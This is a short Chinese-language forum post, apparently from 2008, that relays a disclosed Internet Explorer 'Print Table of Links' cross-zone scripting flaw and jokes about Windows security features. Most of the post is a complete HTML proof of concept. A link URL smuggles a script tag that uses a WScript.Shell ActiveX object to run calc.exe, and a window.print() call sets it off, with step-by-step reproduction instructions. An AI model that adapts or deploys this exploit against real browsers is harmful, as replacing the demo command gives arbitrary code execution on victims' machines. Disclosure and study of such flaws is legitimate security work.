ASLR+DEP+UAC+PatchGuard+IE7(+IE8保护模式)+安全的1b的 Office2007+...
超级安全的架构 终于露出一点问题了。。。。
MS Internet Explorer "Print Table of Links" Cross-Zone Scripting Vulnerability
具体细节:http://aviv.raffon.net/2008/05/14/InternetExplorerQuotPrintTableOfLinksquotCrossZoneScriptingVulnerability.aspx
如果启用了 "Print Table of Links",在打印一个网页的时候,能够导致执行任意代码,当然VISTA上UAC可以拦截它 :)
重现:
1.下面这个地方打上勾
2.把下面代码保存成HTML,用IE打开,打印之,calc.exe会弹出。
[quote]<html>
<body >
Print me with table of links to execute calc.exe
<a href="http://www.bla.com?x=b<script defer >var x=new ActiveXObject('WScript.Shell');x.Run('calc.exe');</script>a.c<u>o</u>m"></a>
<script>window.print();</script>
</body>
</html>[/quote]
